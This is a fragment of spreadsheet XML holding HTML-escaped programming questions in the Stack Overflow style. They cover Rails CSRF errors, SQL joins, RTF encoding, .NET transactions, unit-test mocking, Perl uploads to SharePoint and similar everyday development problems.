&lt;p&gt;This works fine except after the exception, it says donâ€™t flush the session after exception. Iâ€™m not sure why â€“ transaction was rolled back nicely and the database should be ready to accept another transaction no? What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Persistent connection with client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a general way to implement part of an application with JavaScript and supplying a persistent connection to a server? I need the server to be able to push data to the client, regardless of the client being behind a firewall. Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What open source license for my web application that uses both GPL &amp; LGPL? advice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've written an application I'd like to release as open source, but i'm not sure what to license it under.&lt;/p&gt;
&lt;p&gt;It's all my own code &lt;em&gt;apart from&lt;/em&gt; jQuery which is GPL 2.1 and TinyMCE editor which is LGPL 2.1. I'd like to distribute both libraries with my application if possible. Can I release under GPL2.1 ?&lt;/p&gt;
&lt;p&gt;All I want to do is license appropriately and pay my open source dues to the clever authors of jQuery and TinyMCE.&lt;/p&gt;
&lt;p&gt;Any suggestions? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>VBA: preceding zeros dropped when copied over</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a copy of an Excel file using VBA. In the file, there is a column that includes numbers with preceding zeros. The copy of the file is created, but the data in this column is dropped. I need to keep the values with the preceding zeros. How can I resolve this problem with VBA?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to build ImageButton Control Adapter (or more general, how to build a simple control adapter)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My inspiration for this question was my discovery of the very annoying default style (&lt;code&gt;border-width: 0px;&lt;/code&gt;) on the ImageButton web control. The simple solution is to override it by adding your own style to the control e.g. &lt;code&gt;Style="border-width: 2px;"&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How every, it would have been nice to just make a simple control adapter that would just step in at the right place and just tell the control not to render the default styling.&lt;/p&gt;
&lt;p&gt;After looking a bit at the code from the CSSFriendly ControlAdapter project, it seems like they are recreating much of the rendering, which is overkill for what I want to do -- i.e. just change the default styling that is rendered out.&lt;/p&gt;
&lt;p&gt;So the question, how to just modify the rendering of the default styles through control adapters, and leave the rest as is?&lt;/p&gt;
&lt;p&gt;Is it even possible?&lt;/p&gt;
&lt;p&gt;Thanks, Egil.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I copy my entire working copy between hard drives?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whenever I try to copy an entire working copy using simple drag and drop between two computers (e.g. from an old computer to a new one, or from one VM to another) in order to avoid having to redownload the entire several GB set of code from our online repository I get an error as soon as I reach any of the hidden SVN-BASE files.&lt;/p&gt;
&lt;p&gt;Is there a way to copy an entire working copy with these intact?&lt;/p&gt;
&lt;p&gt;I'm using Vista x64.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>protect_from_forgery vs. Firefox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently switched from storing session data in a cookie to storing it in the database.&lt;/p&gt;
&lt;p&gt;Now every POST request causes an &lt;b&gt;ActionController::InvalidAuthenticityToken&lt;/b&gt; error.  It only happens in Firefox, and only on my home machine (I tried it out at work today in the same version of FF and everything was fine).  This leads me to believe that it's something do do with the cookie I deleted yesterday...&lt;/p&gt;
&lt;p&gt;Here's the relevant part of environment.rb:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Your secret key for verifying cookie session data integrity.
# If you change this key, all old sessions will become invalid!
# Make sure the secret is at least 30 characters and all random, 
# no regular words or you'll be exposed to dictionary attacks.
config.action_controller.session = {
:session_key =&amp;gt; '_basillslam_session',
:secret      =&amp;gt; '373ee5b69a4a31d3318485fs368c41fac6b797a1f5c35693b49bd34e8a96291b92dd577bd49de7aeea56c9ffa1af2d8386bafe857220cafacfa0028f01be357d78'
}
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with 'rake db:sessions:create')
config.action_controller.session_store = :active_record_store
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In application.rb:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protect_from_forgery :secret =&amp;gt; 'f1d54db45b47ec94a6a54b1e744fafa6'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's the part of the full trace where the error is thrown:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/request_forgery_protection.rb:79:in `verify_authenticity_token'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/filters.rb:469:in `send!'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/filters.rb:469:in `call'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/filters.rb:441:in `run'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/filters.rb:716:in `run_before_filters'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/filters.rb:695:in `call_filters'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/filters.rb:689:in `perform_action_without_benchmark'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
C:/INSTAN~1/ruby/lib/ruby/1.8/benchmark.rb:293:in `measure'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/benchmarking.rb:68:in `perform_action_without_rescue'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/rescue.rb:199:in `perform_action_without_caching'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/actionpack-2.0.2/lib/action_controller/caching.rb:678:in `perform_action'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/activerecord-2.0.2/lib/active_record/connection_adapters/abstract/query_cache.rb:33:in `cache'
C:/INSTAN~1/ruby/lib/ruby/gems/1.8/gems/activerecord-2.0.2/lib/active_record/query_cache.rb:8:in `cache'
[etc. ... ]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Has anybody experienced this before?  Or does anybody know why this might be happening?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How different is CakePHP from Ruby on Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I almost never hear the word CakePHP without hearing the word Rails shortly afterwards. Are these two frameworks mainly similar based on how they adhere to the MVC model or do they have other significant similarities/differences? &lt;/p&gt;
&lt;p&gt;One of the main attractions of Rails for me is how easy it is to do Ajax. Would that also be true of CakePHP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I upload a document to SharePoint with Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Perl app that runs some perforce operations, in the end I would like it to upload the results to SharePoint website. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What is the simplest Perl script that can accomplish a task of adding a document to SharePoint? &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The script would need to run on Solaris and use as few as possible external libraries as possible (definitely pure classic Perl) getting anything additional installed on these unix boxes is a pain and would have to be done by remote team.&lt;/p&gt;
&lt;p&gt;If this can uploading document can easily be done with wget, that would be of interest too. Anyways, I am looking for 1 or a couple liner that's easy to understand.&lt;/p&gt;
&lt;p&gt;UPDATES based on comments:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Perl Mechanize sounded like a good idea, but for some reason I am not able to authenticate, Error GETing &lt;code&gt;http://sharepoint Unauthorized ....&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I had this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;my $m = WWW::Mechanize-&amp;gt;new(); 
$m-&amp;gt;credentials($user =&amp;gt; $pass); 
$m-&amp;gt;get($url);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But mechanize won't authenticate against sharepoint for some reason.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Does anybody have a link or a sample on how to use sharepoint webdav from unix via perl? &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I installed and tried to open &lt;a href="http://www.webdav.org/perldav" rel="nofollow"&gt;my typical sharepoint site&lt;/a&gt; via "dave" webdav browser, but I get &lt;code&gt;** Unauthorized. **&lt;/code&gt; error. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How to solve it with the webdav approach with perl on unix? &lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Check all radio controls with a specific substring on an ASP.NET form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a .NET-powered questionnaire which contains several repeater controls, each row of which contains three radiobuttons. I'm trying to write a simple Javascript function to check all the controls on the page which contain the word "chkGreen" in the control name/id.&lt;/p&gt;
&lt;p&gt;The page looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Repeater 1
Description 1           ( ) Green ( ) Yellow ( ) Red
Description 2           ( ) Green ( ) Yellow ( ) Red
Description 3           ( ) Green ( ) Yellow ( ) Red
Repeater 2
Description 1           ( ) Green ( ) Yellow ( ) Red
Description 2           ( ) Green ( ) Yellow ( ) Red
Description 3           ( ) Green ( ) Yellow ( ) Red
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's the function so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   for (i = 0; i &amp;lt; document.Form1.elements.length; i++) {
      var _control = document.Form1.elements[i].id
      if (_control.indexOf("chkGreen") &amp;gt; 0) {
         eval(_control.checked = true);
      }
   }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function does not work. When I add a document.write or alert() to the statement, it properly fires, so the logic is apparently working, it's just the actual radiobutton check code is not working.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: how do I check if a Date is within a certain range?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a series of ranges with start dates and end dates. I want to check to see if a date is within that range.&lt;/p&gt;
&lt;p&gt;Date.before() and Date.after() seem to be a little awkward to use. What I really need is something like this pseudocode:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;boolean isWithinRange(Date testDate) {
    return testDate &amp;gt;= startDate &amp;amp;&amp;amp; testDate &amp;lt;= endDate;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Not sure if it's relevant, but the dates I'm pulling from the database have timestamps. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Director 11 and Flash with AS 2 communication</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Director project with 3 scripts (2 behaviors and 1 movie script). I have the following code in my movie script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;on startRecording ()
  --do stuff
  _movie.script["script2"].passGrade(75, 3, 4)
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and in one of my behavior scripts, I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;on passGrade (acc, dur, tim)
  member("Assessment", "Assessment").displayGrade(acc, dur, tim)
end passGrade
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where the name of the second behavior script is &lt;code&gt;script2&lt;/code&gt;and there is a Flash object on the stage called &lt;code&gt;Assessment&lt;/code&gt; which has an ActionScript method called &lt;code&gt;displayGrade&lt;/code&gt; which takes 3 numbers as input.&lt;/p&gt;
&lt;p&gt;I have 2 questions. First, the call &lt;code&gt;-movie.script["script2"].passGrade(75, 3, 4)&lt;/code&gt; does not work, and I can't figure out why. Am I not allowed to call from a movie script to a behavior? Or am I not doing this correctly? The second question is how do I call the ActionScript method? The script is defined as a behavior for the Flash object, which is called &lt;code&gt;Assessment&lt;/code&gt;, but Director doesn't seem to be able to locate the method.&lt;/p&gt;
&lt;p&gt;I am using Director 11 with HotFix 3, and the Flash object was compiled for ActionScript 2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating an AJAX Script Control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Call me a 'n00b', but I am new to creating Script Controls. I want to create a simple control with 3 text boxes. I have a .cs file that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public class SmokingCalc : ScriptControl
    {
        public SmokingCalc()
        {
            Render(htmlWriter);
        }
        protected override void Render(HtmlTextWriter writer)
        {
            costTextbox.RenderControl(writer);
            base.Render(writer);
        }
        protected override IEnumerable&amp;lt;ScriptDescriptor&amp;gt;
                GetScriptDescriptors()
        {
            ScriptControlDescriptor descriptor = new ScriptControlDescriptor("SmokingCalc.SmokingCalc", this.ClientID);
            yield return descriptor;
        }
        // Generate the script reference
        protected override IEnumerable&amp;lt;ScriptReference&amp;gt;
                GetScriptReferences()
        {
            yield return new ScriptReference("SmokingCalc.SmokingCalc.js", this.GetType().Assembly.FullName);
        }
        protected HtmlTextWriter htmlWriter;
        protected TextBox costTextbox;
        protected TextBox amountTextbox;
        protected TextBox yearsTextbox;
        protected Button submitButton;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I have absolutely no idea why the textbox wont render? I think I am missing something...&lt;/p&gt;
&lt;p&gt;[EDIT] The error I'm getting is the "Object reference is not set to an instance to an object".&lt;/p&gt;
&lt;p&gt;[ANSWERED] I changed the file as follows, and it works, so far at least.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   public class SmokingCalc : ScriptControl
    {
        public SmokingCalc()
        {
        }
        protected override void CreateChildControls()
        {
            base.CreateChildControls();
            costTextbox.ID = "costTextbox";
            amountTextbox.ID = "amountTextbox";
            yearsTextbox.ID = "yearsTextbox";
            submitButton.ID = "submitButton";
            submitButton.Text = "Submit";
            Controls.Add(costTextbox);
            Controls.Add(amountTextbox);
            Controls.Add(yearsTextbox);
            Controls.Add(submitButton);
        }
        protected override IEnumerable&amp;lt;ScriptDescriptor&amp;gt;
                GetScriptDescriptors()
        {
            ScriptControlDescriptor descriptor = new ScriptControlDescriptor("SmokingCalc.SmokingCalc", this.ClientID);
            descriptor.AddProperty("costTextboxID", costTextbox.ClientID);
            descriptor.AddProperty("amountTextboxID", amountTextbox.ClientID);
            descriptor.AddProperty("yearsTextboxID", amountTextbox.ClientID);
            descriptor.AddProperty("submitButtonID", submitButton.ClientID);
            yield return descriptor;
        }
        // Generate the script reference
        protected override IEnumerable&amp;lt;ScriptReference&amp;gt;
                GetScriptReferences()
        {
            yield return new ScriptReference("SmokingCalc.SmokingCalc.js", this.GetType().Assembly.FullName);
        }
        protected TextBox costTextbox = new TextBox();
        protected TextBox amountTextbox = new TextBox();
        protected TextBox yearsTextbox = new TextBox();
        protected Button submitButton = new Button();
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Two encodings used in RTF string won't display correct in RichTextBox?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to parse some RTF, that i get back from the server. For most text i get back  this works fine (and using a RichTextBox control will do the job), however some of the  RTF seems to contain an additional "encoding" and some of the characters get corrupted.&lt;/p&gt;
&lt;p&gt;The original string is as follows (and contains some of the characters used in Polish):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Ä…Ä‡Ä™Å‚Å„Ã³Å›ÅºÅ¼
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The RTF string with hex encoded characters that is send back looks like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{\lang1045\langfe1045\f16383 {\'b9\'e6\'ea\'b3{\f7 \'a8\'bd\'a8\'ae}\'9c\'9f\'bf}}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am having problems decoding the &lt;strong&gt;Å„Ã³&lt;/strong&gt; characters in the returned string, they seem to be represented by two hex values each, whereas the rest of the string is represented (as expected) by single hex values.&lt;/p&gt;
&lt;p&gt;Using a RichTextBox control to "parse" the RTF results in corrupter text (the two characters in question are displayed as four different unwanted characters).&lt;/p&gt;
&lt;p&gt;If i would encode the plain string myself to hex using the expected codepage (1250, Latin 2, the ANSI codepage for lcid 1045) i would get the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\'B9\'E6\'EA\'B3\'F1\'F3\'9C\'9F\'BF
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am lost as to how i can correctly decode the &lt;strong&gt;{\f7 \'a8\'bd\'a8\'ae}&lt;/strong&gt; part of the returned string that should correspond to &lt;strong&gt;Å„Ã³&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Note that there is no font definition for &lt;strong&gt;\f7&lt;/strong&gt; in the RTF header and the string looks fine when viewed directly on the server meaning that the characters (if they are corrupted) are corrupted somewhere in the conversion before sending.&lt;/p&gt;
&lt;p&gt;I am not sure if the problem is on the server side (as i have no control over that), but since the server is used for a lot of translation work i assume that the returned string is ok.&lt;/p&gt;
&lt;p&gt;I have been going through the RTF specs but can not find any hint regarding this type of combination of encodings.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you display custom UIViews in InterfaceBuilder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I seem to enjoy designing new &lt;code&gt;UIViews&lt;/code&gt; and &lt;code&gt;UIControls&lt;/code&gt; that implement their own &lt;code&gt;-drawRect:&lt;/code&gt; method. This work well for me, especially when composed using &lt;code&gt;UIViews&lt;/code&gt; in &lt;em&gt;Interface Builder&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;But composing them in Interface Builder is annoying because they just show up as boring plain rectangles.&lt;/p&gt;
&lt;p&gt;It would be great if the views would actually render themselves as the built-in controls do.&lt;/p&gt;
&lt;p&gt;Is there any way I can structure my project so that Interface Builder will render my custom views?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does MIcroQuill Smartheap throw "mem_bad_pointer" errors after I embed perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am embedding perl in a C++ application that uses &lt;a href="http://www.microquill.com/smartheap/index.html" rel="nofollow"&gt;Smartheap&lt;/a&gt;.  Regardless of whether I compile the perl to use its own malloc or the system's I get a bunch of error mem___bad_pointer dialogs.  It seems to work fine when I just click "ok" and ignore the errors, but obviously I need to actually solve the problem.&lt;/p&gt;
&lt;p&gt;Do I maybe need to compile SmartHeap into my perl build?  Is that even feasible?&lt;/p&gt;
&lt;p&gt;Below is &lt;a href="http://www.microquill.com/kb/docs/APPENDXB.html" rel="nofollow"&gt;the only documentation&lt;/a&gt; page about mem__bad_pointer's I could find, but I am no closer to solving the problem.  I do not understand how or where perl and Smartheap are conflicting with each other.  Any pointers appreciated.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The pointer was allocated by a memory manager other than SmartHeap, such as from another DLL or EXE, or from the compiler runtime library. Examine your map file to see that the SmartHeap version of malloc, _fmalloc/farmalloc, or operator new is being linked in.&lt;/li&gt;
&lt;li&gt;The pointer is â€œwildâ€ (uninitialized), is allocated on the stack (local variable), or is otherwise invalid.&lt;/li&gt;
&lt;li&gt;The pointer was previously freed. If SmartHeap has freed the page from which the pointer was originally allocated, SmartHeap wonâ€™t be able to detect that itâ€™s a double free. However, SmartHeap will report the invalid pointer. Use dbgMemDeferFreeing to catch this type of bug.&lt;/li&gt;
&lt;li&gt;The pointer was incremented or decremented since the time of allocation.&lt;/li&gt;
&lt;li&gt;For 16-bit x86, the pointer was cast to a near pointer after allocation, in which case the segment portion of the pointer has been lost.&lt;/li&gt;
&lt;li&gt;The memory pool from which the pointer was allocated has been freed, or SmartHeap has been unregistered from the task.&lt;/li&gt;
&lt;li&gt;The task from which the pointer was allocated has terminated (see section B.4).&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How does TransactionScope roll back transactions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing an integration test where I will be inserting a number of objects into a database and then checking to make sure whether my method retrieves those objects.&lt;/p&gt;
&lt;p&gt;My connection to the database is through NHibernate...and my usual method of creating such a test would be to do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NHibernateSession.BeginTransaction();
//use nhibernate to insert objects into database
//retrieve objects via my method
//verify actual objects returned are the same as those inserted
NHibernateSession.RollbackTransaction();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I've recently found out about &lt;a href="http://msdn.microsoft.com/en-us/library/system.transactions.transactionscope.aspx"&gt;TransactionScope&lt;/a&gt; which apparently can be used for this very purpose...&lt;/p&gt;
&lt;p&gt;Some &lt;a href="http://dotnetslackers.com/articles/ado_net/Managing_Transactions_using_TransactionScope.aspx"&gt;example code I've found&lt;/a&gt; is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static int AddDepartmentWithEmployees(Department dept)
{
    int res = 0;
    DepartmentAdapter deptAdapter = new DepartmentAdapter();
    EmployeeAdapter empAdapter = new EmployeeAdapter();
    using (TransactionScope txScope = new TransactionScope())
    {
        res += deptAdapter.Insert(dept.DepartmentName);
        //Custom method made to return Department ID 
        //after inserting the department "Identity Column"
        dept.DepartmentID = deptAdapter.GetInsertReturnValue();
        foreach(Employee emp in dept.Employees)
        {
            emp.EmployeeDeptID = dept.DepartmentID;
            res += empAdapter.Insert(emp.EmployeeName, emp.EmployeeDeptID);
        }
        txScope.Complete();
    }
    return res;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I believe that if I don't include the line &lt;code&gt;txScope.Complete()&lt;/code&gt; that the data inserted will be rolled back. But unfortunately I don't understand how that is possible... how does the &lt;code&gt;txScope&lt;/code&gt; object keep a track of the &lt;code&gt;deptAdapter&lt;/code&gt; and &lt;code&gt;empAdapter&lt;/code&gt; objects and their transactions on the database.&lt;/p&gt;
&lt;p&gt;I feel like I'm missing a bit of information here...am I really able to replace my &lt;code&gt;BeginTransaction()&lt;/code&gt; and &lt;code&gt;RollbackTransaction(&lt;/code&gt;) calls by surrounding my code using &lt;code&gt;TransactionScope&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;If not, how then does &lt;code&gt;TransactionScope&lt;/code&gt; work to roll back transactions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I be testing a methods implementation using mocks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a bit of trouble doing some unit-testing using moq.&lt;/p&gt;
&lt;p&gt;If I have a function like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public string GetName(IMapinfoWrapper wrapper)
{
   return wrapper.Evaluate("My com command");
   ///"My comm command" is the same all the time.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I have a test that checks the return value of the GetName function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Test]
public void Test()
{
  Mock&amp;lt;IMapinfoWrapper&amp;gt; mock = new Mock&amp;lt;IMapinfoWrapper&amp;gt;();
  mock.Expect(mapinfo =&amp;gt; mapinfo.Evaluate(It.IsAny&amp;lt;String&amp;gt;()))
      .Returns("TableName");
  Assert.AreEqual("TableName", GetName(mock.object));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So my question is should the mock be define like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mock.Expect(mapinfo =&amp;gt; mapinfo.Evaluate(It.IsAny&amp;lt;String&amp;gt;()))
    .Returns("TableName");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mock.Expect(mapinfo =&amp;gt; mapinfo.Evaluate("My com command")
    .Returns("TableName");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My only problem with using the second way is that I feel like I'm tying the implementation  of the method GetName to always use the "My com command" string internally.  &lt;/p&gt;
&lt;p&gt;Is this what I should be doing or am I doing this all wrong.?  &lt;br&gt;I have only started doing unit-testing and mocking so I'm still not sure how everything should go together.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I control the format in which MS-SQL Server returns datetime values?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Specifically, I wish to get the date format in a pure (ISO) format:&lt;/p&gt;
&lt;p&gt;YYYY-MM-DD HH:mm:ss&lt;/p&gt;
&lt;p&gt;I'm looking for a SET command or something that I can use.&lt;/p&gt;
&lt;p&gt;I do not wish to rely on the culture setting of the server.&lt;/p&gt;
&lt;p&gt;Note: I'm interested in the string format in which dates are returned, not entered.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WS Addressing and Multiple "ReplyTo"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please any one clarify me WS Addressing in WCF  does support the multiple ReplyTo or not?.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Top 1 on Left Join SubQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to take a person and display their current insurance along with their former insurance.  I guess one could say that I'm trying to flaten my view of customers or people.  I'm running into an issue where I'm getting multiple records back due to multiple records existing within my left join subqueries.  I had hoped I could solve this by adding "TOP 1" to the subquery, but that actually returns nothing...&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    SELECT 
	p.person_id AS 'MIRID'
	, p.firstname AS 'FIRST'
	, p.lastname AS 'LAST'
	, pg.name AS 'GROUP'
	, e.name AS 'AOR'
	, p.leaddate AS 'CONTACT DATE'
	, [dbo].[GetPICampaignDisp](p.person_id, '2009') AS 'PI - 2009'
	, [dbo].[GetPICampaignDisp](p.person_id, '2008') AS 'PI - 2008'
	, [dbo].[GetPICampaignDisp](p.person_id, '2007') AS 'PI - 2007'
	, a_disp.name AS 'CURR DISP'
	, a_ins.name AS 'CURR INS'
	, a_prodtype.name AS 'CURR INS TYPE'
	, a_t.date AS 'CURR INS APP DATE'
	, a_t.effdate AS 'CURR INS EFF DATE' 
	, b_disp.name AS 'PREV DISP'
	, b_ins.name AS 'PREV INS'
	, b_prodtype.name AS 'PREV INS TYPE'
	, b_t.date AS 'PREV INS APP DATE'
	, b_t.effdate AS 'PREV INS EFF DATE'
	, b_t.termdate AS 'PREV INS TERM DATE'
FROM 
	[person] p
LEFT OUTER JOIN 
	[employee] e
ON 
	e.employee_id = p.agentofrecord_id
INNER JOIN 
	[dbo].[person_physician] pp
ON 
	p.person_id = pp.person_id
INNER JOIN 
	[dbo].[physician] ph
ON
	ph.physician_id = pp.physician_id
INNER JOIN
	[dbo].[clinic] c
ON 
	c.clinic_id = ph.clinic_id
INNER JOIN
	[dbo].[d_Physgroup] pg
ON
	pg.d_physgroup_id = c.physgroup_id
LEFT OUTER JOIN 
	(
		SELECT
			tr1.*
		FROM 
			[transaction] tr1
		LEFT OUTER JOIN 
			[d_vendor] ins1
		ON 
			ins1.d_vendor_id = tr1.d_vendor_id
		LEFT OUTER JOIN 
			[d_product_type] prodtype1
		ON 
			prodtype1.d_product_type_id = tr1.d_product_type_id
		LEFT OUTER JOIN 
			[d_commission_type] ctype1
		ON 
			ctype1.d_commission_type_id = tr1.d_commission_type_id
		WHERE
			prodtype1.name &amp;lt;&amp;gt; 'Medicare Part D'
			AND tr1.termdate IS NULL
	) AS a_t
ON
	a_t.person_id = p.person_id
LEFT OUTER JOIN 
	[d_vendor] a_ins
ON 
	a_ins.d_vendor_id = a_t.d_vendor_id
LEFT OUTER JOIN 
	[d_product_type] a_prodtype
ON 
	a_prodtype.d_product_type_id = a_t.d_product_type_id
LEFT OUTER JOIN 
	[d_commission_type] a_ctype
ON 
	a_ctype.d_commission_type_id = a_t.d_commission_type_id
LEFT OUTER JOIN
	[d_disposition] a_disp
ON
	a_disp.d_disposition_id = a_t.d_disposition_id
LEFT OUTER JOIN 
	(
		SELECT
			tr2.*
		FROM 
			[transaction] tr2
		LEFT OUTER JOIN 
			[d_vendor] ins2
		ON 
			ins2.d_vendor_id = tr2.d_vendor_id
		LEFT OUTER JOIN 
			[d_product_type] prodtype2
		ON 
			prodtype2.d_product_type_id = tr2.d_product_type_id
		LEFT OUTER JOIN 
			[d_commission_type] ctype2
		ON 
			ctype2.d_commission_type_id = tr2.d_commission_type_id
		WHERE
			prodtype2.name &amp;lt;&amp;gt; 'Medicare Part D'
			AND tr2.termdate IS NOT NULL
	) AS b_t
ON
	b_t.person_id = p.person_id
LEFT OUTER JOIN 
	[d_vendor] b_ins
ON 
	b_ins.d_vendor_id = b_t.d_vendor_id
LEFT OUTER JOIN 
	[d_product_type] b_prodtype
ON 
	b_prodtype.d_product_type_id = b_t.d_product_type_id
LEFT OUTER JOIN 
	[d_commission_type] b_ctype
ON 
	b_ctype.d_commission_type_id = b_t.d_commission_type_id
LEFT OUTER JOIN
	[d_disposition] b_disp
ON
	b_disp.d_disposition_id = b_t.d_disposition_id
WHERE
	pg.d_physgroup_id = @PhysGroupID
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How many sub-directories should be put into a directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At SO there has been much discussion about how many files in a directory are appropriate: on older filesystems stay below a fey thousand on newer stay below a few hundred thousand.
Generally the suggestion is to create sub-directories for every few thousand files.&lt;/p&gt;
&lt;p&gt;So the next question is: what is the maximum number of sub directories I should put into a directory? Nesting them too deep kills dir tree traversal performance. IS there a nesting them to shallow?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GLSL versions change log?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there someplace I can read about the changes and additions made in GLSL from version 1.1 to 1.2 and from 1.2 to 1.3?&lt;br /&gt;
